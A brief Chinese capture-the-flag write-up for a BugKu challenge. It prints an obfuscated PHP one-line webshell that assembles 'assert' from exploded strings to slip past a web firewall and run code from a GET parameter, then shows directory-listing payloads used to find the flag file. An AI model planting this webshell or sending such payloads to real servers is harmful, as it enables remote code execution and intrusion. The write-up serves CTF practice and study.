过狗一句话-BugKu

1.在题目提示里面有大佬免费赠送的过狗一句话,一般操作,管他有用没用先拿过来再说。

<?php $poc = "a#s#s#e#r#t";
$poc_1 = explode("#", $poc);
$poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3] . $poc_1[4] . $poc_1[5];
$poc_2($_GET['s'])
?>

上面的一句话使用的explode函数,变相传入了assert函数,让我们能够用assert函数执行任意命令。

2.权限越大,搜集的信息越多,嘻嘻。那我们就先扫描一下当前目录,看看有什么发现。构造语句:

http://123.206.87.240:8010/?s=print_r(scandir('./'))

过狗一句话

3.果然收获还是不小的,直接打开f14g.txt这个文件就得到flag了。

PS:一个小小的奇淫技巧:/?s=print_r(scandir('../')),自行试试这个payload吧,相信你还可以发现更多信息。

发表评论

电子邮件地址不会被公开。必填项已用 * 标注